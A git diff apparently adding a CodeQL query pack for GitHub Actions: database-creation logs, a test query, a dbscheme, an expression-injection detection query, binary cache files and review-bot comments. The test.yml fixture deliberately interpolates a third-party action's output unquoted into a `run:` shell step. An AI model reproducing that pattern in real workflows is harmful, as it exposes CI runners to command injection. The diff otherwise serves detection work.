TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files 
written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-02-03 10:17:54] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test +[2024-02-03 10:17:54] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-02-03 10:17:54] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-02-03 10:17:54] [PROGRESS] database init> Calculated baseline information for languages: (53ms). +[2024-02-03 10:17:54] [PROGRESS] database init> Resolving extractor yaml. +[2024-02-03 10:17:54] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:54] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:54] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. This in-progress database is ready to be populated by an extractor. +[2024-02-03 10:17:54] Plumbing command codeql database init completed. 
+[2024-02-03 10:17:54] [PROGRESS] database create> Running build command: [] +[2024-02-03 10:17:54] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:54] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. +[2024-02-03 10:17:54] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] +[2024-02-03 10:17:55] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] +[2024-02-03 10:17:55] Plumbing command codeql database trace-command completed. +[2024-02-03 10:17:55] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:55] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:55] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db... 
+[2024-02-03 10:17:55] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml +[2024-02-03 10:17:55] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache/version does not exist +[2024-02-03 10:17:55] Tuple pool not found. Clearing relations with cached strings +[2024-02-03 10:17:55] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode clear. +[2024-02-03 10:17:55] Sequence stamp origin is -6222583512417648685 +[2024-02-03 10:17:55] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Trimming completed (7ms): Purged everything. +[2024-02-03 10:17:55] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml +[2024-02-03 10:17:55] Found 2 TRAP files (2.87 KiB) +[2024-02-03 10:17:55] [PROGRESS] dataset import> Importing TRAP files +[2024-02-03 10:17:55] Importing test.yml.trap.gz (1 of 2) +[2024-02-03 10:17:55] Importing sourceLocationPrefix.trap.gz (2 of 2) +[2024-02-03 10:17:55] [PROGRESS] dataset import> Merging relations +[2024-02-03 10:17:55] Merging 1 fragment for 'files'. +[2024-02-03 10:17:55] Merged 8 bytes for 'files'. +[2024-02-03 10:17:55] Merging 1 fragment for 'folders'. +[2024-02-03 10:17:55] Merged 80 bytes for 'folders'. 
+[2024-02-03 10:17:55] Merging 1 fragment for 'containerparent'. +[2024-02-03 10:17:55] Merged 80 bytes for 'containerparent'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_scalars'. +[2024-02-03 10:17:55] Merged 552 bytes for 'yaml_scalars'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml'. +[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'yaml'. +[2024-02-03 10:17:55] Merging 1 fragment for 'locations_default'. +[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'locations_default'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_locations'. +[2024-02-03 10:17:55] Merged 472 bytes for 'yaml_locations'. +[2024-02-03 10:17:55] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-02-03 10:17:55] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-02-03 10:17:55] Saving string and id pools to disk. +[2024-02-03 10:17:55] Finished importing TRAP files. +[2024-02-03 10:17:55] Read 13.45 KiB of uncompressed TRAP data. +[2024-02-03 10:17:55] Relation data size: 3.93 KiB (merge rate: 52.86 KiB/s) +[2024-02-03 10:17:55] String pool size: 2.05 MiB +[2024-02-03 10:17:55] ID pool size: 1.03 MiB +[2024-02-03 10:17:55] [PROGRESS] dataset import> Finished writing database (relations: 3.93 KiB; string pool: 2.05 MiB). +[2024-02-03 10:17:55] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-02-03 10:17:55] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Plumbing command codeql dataset import completed. +[2024-02-03 10:17:55] [PROGRESS] database finalize> TRAP import complete (447ms). +[2024-02-03 10:17:55] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-02-03 10:17:56] [PROGRESS] database cleanup> TRAP files cleaned up (4ms). 
+[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). +[2024-02-03 10:17:56] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml. +[2024-02-03 10:17:56] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode trim. +[2024-02-03 10:17:56] Sequence stamp origin is -6222583510647662597 +[2024-02-03 10:17:56] Pausing evaluation to zealously trim disk at sequence stamp o+0 +[2024-02-03 10:17:56] Unpausing evaluation +[2024-02-03 10:17:56] Trimming completed (3ms): Trimmed disposable data from cache. +[2024-02-03 10:17:56] Pausing evaluation to close the cache at sequence stamp o+1 +[2024-02-03 10:17:56] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:56] Unpausing evaluation +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml +[2024-02-03 10:17:56] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml (5ms). +[2024-02-03 10:17:56] Plumbing command codeql dataset cleanup completed. +[2024-02-03 10:17:56] Plumbing command codeql database cleanup completed with status 0. +[2024-02-03 10:17:56] [PROGRESS] database finalize> Finished zipping source archive (578.00 B). +[2024-02-03 10:17:56] Plumbing command codeql database finalize completed. 
+[2024-02-03 10:17:56] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:56] Terminating normally. diff --git a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log new file mode 100644 index 000000000000..858ec59a13da --- /dev/null +++ b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log 
@@ -0,0 +1,15 @@ +[2024-02-03 10:17:55] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:55] Log file was started late. +[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:55] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --format=json +[2024-02-03 10:17:55] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test/test.yml" + ] +[2024-02-03 10:17:55] [DETAILS] database index-files> Found 1 files. +[2024-02-03 10:17:55] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:55] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] +[2024-02-03 10:17:55] Terminating normally. 
diff --git a/ql/lib/test-db/src.zip b/ql/lib/test-db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..3dbf073c49924685cbbad30b59944af574c77ae9 GIT binary patch literal 578 zcmWIWW@Zs#;Nak3unBUGU_b)iKz3+xYEiL%L3v(DYH>+wk$!P%a!z8BenC-wR%&ud zv3_E5NoIatv3_!XN@`(_E{t24qo0$Rqz}>rCiE(Eb6SH=7admM+4Ebw}@-&*HCX*mO-(<>9jurcV|DmT#ZViIkhd$??4S(D4@jEe#GH zLQ}rY-Mre`mRS<8;aoAyhp>O}l|q-Aya^WjAv z%^yDeS19qFwD3&e-ivQz|0Q-uY`&Q}r|!?E8*|RR+su$Qv0+zf@ZJtR^@49DGYywj zum^ava}-DO?zLiMVA#RLz!2cg$Rxsmh%{t5P^6&(Dn?;|H!B;+a7G}k1k#&<4q{*c E0HyckLI3~& literal 0 HcmV?d00001 diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql new file mode 100644 index 000000000000..2e358f3c30bd --- /dev/null +++ b/ql/lib/test/test.ql 
@@ -0,0 +1,59 @@
+import codeql.actions.ast.internal.Actions
+import codeql.actions.Ast
+import codeql.actions.Cfg as Cfg
+import codeql.actions.DataFlow
+import codeql.Locations
+
+query predicate files(File f) { any() }
+
+query predicate yamlNodes(YamlNode n) { any() }
+
+query predicate jobNodes(JobStmt s) { any() }
+
+query predicate stepNodes(StepStmt s) { any() }
+
+query predicate usesNodes(UsesExpr s) { any() }
+
+query predicate usesSteps(UsesExpr call, string argname, Expression arg) {
+ call.getArgument(argname) = arg
+}
+
+query predicate runSteps1(RunExpr run, string body) { run.getScript() = body }
+
+query predicate runSteps2(RunExpr run, Expression bodyExpr) { run.getScriptExpr() = bodyExpr }
+
+query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNode() = run }
+
+query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() }
+
+query predicate outputAccesses(StepOutputAccessExpr va, string id, string var) {
+ id = va.getStepId() and var = va.getVarName()
+}
+
+query predicate orphanVarAccesses(ExprAccessExpr va, string var) {
+ var = va.getExpression() and
+ not exists(AstNode n | n = va.getParentNode())
+}
+
+query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode parent) {
+ var = va.getExpression() and
+ parent = va.getParentNode()
+}
+
+query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent }
+
+query predicate cfgNodes(Cfg::Node n) { any() }
+
+query predicate dfNodes(DataFlow::Node e) { any() }
+
+query predicate exprNodes(DataFlow::ExprNode e) { any() }
+
+query predicate argumentNodes(DataFlow::ArgumentNode e) { any() }
+
+query predicate localFlow(UsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() }
+
+query predicate usesIds(UsesExpr s, string a) { s.getId() = a }
+
+query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a }
+
+query predicate nodeLocations(DataFlow::Node n, Location l) { 
n.getLocation() = l } diff --git a/ql/lib/test/test.yml b/ql/lib/test/test.yml new file mode 100644 index 000000000000..2760a6c3d35f --- /dev/null +++ b/ql/lib/test/test.yml @@ -0,0 +1,36 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme new file mode 100644 index 000000000000..20d83c71ee67 --- /dev/null +++ b/ql/lib/yaml.dbscheme 
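Review bot: `localFlow(UsesExpr s, StepOutputAccessExpr o)` only joins a `uses:` step to output accesses carrying the same id (`s.getId() = o.getStepId()`) and never consults `DataFlow`, so its name promises more than the predicate checks. A name such as `stepOutputRefs`, plus a one-line `/** Relates a step to the `steps.<id>.outputs.*` accesses that name it; an id-join, not a flow query. */` comment, would describe the relation honestly. The visible part of the diff adds no `.expected` file next to `test.ql`, so the output of these query predicates is not pinned; if one exists elsewhere in the commit, ignore this.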
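Review bot: Nothing in the fixture marks which step is the intended source and which the intended sink for the injection query, even though the `run: echo ${{needs.job1.outputs.job_output}}` line is the whole reason the file exists. A comment above the `id: sink` step, `# sink: job_output is interpolated unquoted into the shell script`, and one above the `id: source` step, `# source: output of a third-party action, reaches job_output via the find-and-replace step`, would make the expected path readable without running the query. That also documents why `job2` carries `if: ${{ always() }}` and `needs: job1`, which otherwise look incidental.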
@@ -0,0 +1,80 @@
+/*- YAML -*/
+
+#keyset[parent, idx]
+yaml (unique int id: @yaml_node,
+ int kind: int ref,
+ int parent: @yaml_node_parent ref,
+ int idx: int ref,
+ string tag: string ref,
+ string tostring: string ref);
+
+case @yaml_node.kind of
+ 0 = @yaml_scalar_node
+| 1 = @yaml_mapping_node
+| 2 = @yaml_sequence_node
+| 3 = @yaml_alias_node
+;
+
+@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node;
+
+@yaml_node_parent = @yaml_collection_node | @file;
+
+yaml_anchors (unique int node: @yaml_node ref,
+ string anchor: string ref);
+
+yaml_aliases (unique int alias: @yaml_alias_node ref,
+ string target: string ref);
+
+yaml_scalars (unique int scalar: @yaml_scalar_node ref,
+ int style: int ref,
+ string value: string ref);
+
+yaml_errors (unique int id: @yaml_error,
+ string message: string ref);
+
+yaml_locations(unique int locatable: @yaml_locatable ref,
+ int location: @location_default ref);
+
+@yaml_locatable = @yaml_node | @yaml_error;
+
+/*- Files and folders -*/
+
+/**
+ * The location of an element.
+ * The location spans column `startcolumn` of line `startline` to
+ * column `endcolumn` of line `endline` in file `file`.
+ * For more information, see
+ * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/).
+ */
+locations_default(
+ unique int id: @location_default,
+ int file: @file ref,
+ int beginLine: int ref,
+ int beginColumn: int ref,
+ int endLine: int ref,
+ int endColumn: int ref
+);
+
+files(
+ unique int id: @file,
+ string name: string ref
+);
+
+folders(
+ unique int id: @folder,
+ string name: string ref
+);
+
+@container = @file | @folder
+
+containerparent(
+ int parent: @container ref,
+ unique int child: @container ref
+);
+
+/*- Source location prefix -*/
+
+/**
+ * The source location of the snapshot.
+ */
+sourceLocationPrefix(string prefix : string ref); 
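Review bot: The doc comment on `locations_default` talks about `startcolumn`, `startline`, `endline` and `endcolumn`, but the columns declared right below it are `beginLine`, `beginColumn`, `endLine` and `endColumn`; the sentence should read "spans column `beginColumn` of line `beginLine` to column `endColumn` of line `endLine` in file `file`" so the comment matches the schema it describes. As a point of style, `@container = @file | @folder` is the only union declaration in the file without a terminating `;`, unlike `@yaml_collection_node`, `@yaml_node_parent` and `@yaml_locatable`; `@container = @file | @folder;` keeps the file consistent.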
diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats new file mode 100644 index 000000000000..1c35ae984020 --- /dev/null +++ b/ql/lib/yaml.dbscheme.stats @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql new file mode 100644 index 000000000000..f8d6e0c804b6 --- /dev/null +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -0,0 +1,37 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + " }}, which may be controlled by an external user." diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml new file mode 100644 index 000000000000..56f10b81e0c7 --- /dev/null +++ b/ql/src/codeql-pack.lock.yml 
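Review bot: `ExpressionInjectionSink` only matches `RunExpr.getScriptExpr()`, so the `script:` key named in the `@description` is never a sink; either narrow the description to `run:` or extend the sink class to cover that key (the AST classes used here do not show a node for it, so that may need library support). The `@id actions/command-injection` also does not match the query name `Expression injection in Actions`; `@id actions/expression-injection` would keep the two aligned. Finally, the `select` casts the sink expression with `.(ExprAccessExpr)`, so any sink whose expression is not an `ExprAccessExpr` silently yields no alert row; either restrict `ExpressionInjectionSink` to that type or build the message without the cast.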
@@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.7 + codeql/dataflow: + version: 0.1.7 + codeql/ssa: + version: 0.2.7 + codeql/typetracking: + version: 0.2.7 + codeql/util: + version: 0.2.7 + codeql/yaml: + version: 0.2.7 +compiled: false diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml new file mode 100644 index 000000000000..f4c43168664a --- /dev/null +++ b/ql/src/qlpack.yml @@ -0,0 +1,14 @@ +--- +library: false +name: codeql/actions-queries +version: 0.0.1 +groups: + - actions + - queries +suites: codeql-suites +extractor: yaml +defaultSuiteFile: codeql-suites/actions-code-scanning.qls +dependencies: + codeql/actions-all: ${workspace} +warnOnImplicitThis: true +tests: test diff --git a/ql/src/test-db/baseline-info.json b/ql/src/test-db/baseline-info.json new file mode 100644 index 000000000000..9e26dfeeb6e6 --- /dev/null +++ b/ql/src/test-db/baseline-info.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/ql/src/test-db/codeql-database.yml b/ql/src/test-db/codeql-database.yml new file mode 100644 index 000000000000..1dedebb70bed --- /dev/null +++ b/ql/src/test-db/codeql-database.yml @@ -0,0 +1,10 @@ +--- +sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test +baselineLinesOfCode: 0 +unicodeNewlines: false +columnKind: utf16 +primaryLanguage: yaml +creationMetadata: + cliVersion: 2.16.1 + creationTime: 2024-02-03T09:17:52.592220Z +finalised: true diff --git a/ql/src/test-db/db-yaml/default/cache/.lock b/ql/src/test-db/db-yaml/default/cache/.lock new file mode 100644 index 000000000000..e69de29bb2d1 
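Review bot: The `ql/src/test-db/codeql-database.yml` hunk commits a generated CodeQL database whose `sourceLocationPrefix` is the absolute path `/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test`, which resolves on no other machine and embeds the developer's username and directory layout in the repository. The same holds for the `ql/lib/test-db` log hunks earlier in the diff and the binary `cache/` and `tuple-pool/` files that follow this one; all of them are outputs of `codeql database create` and are regenerated on every run. Suggest excluding `test-db/` from version control and rebuilding the databases in the test runner instead, so the diff carries only `test.ql`, `test.yml` and the pack configuration.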
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2 GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info new file mode 100644 index 0000000000000000000000000000000000000000..9c1ea6cdeb296b714876d0e928d9978e9ec788c9 GIT binary patch literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 
diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk 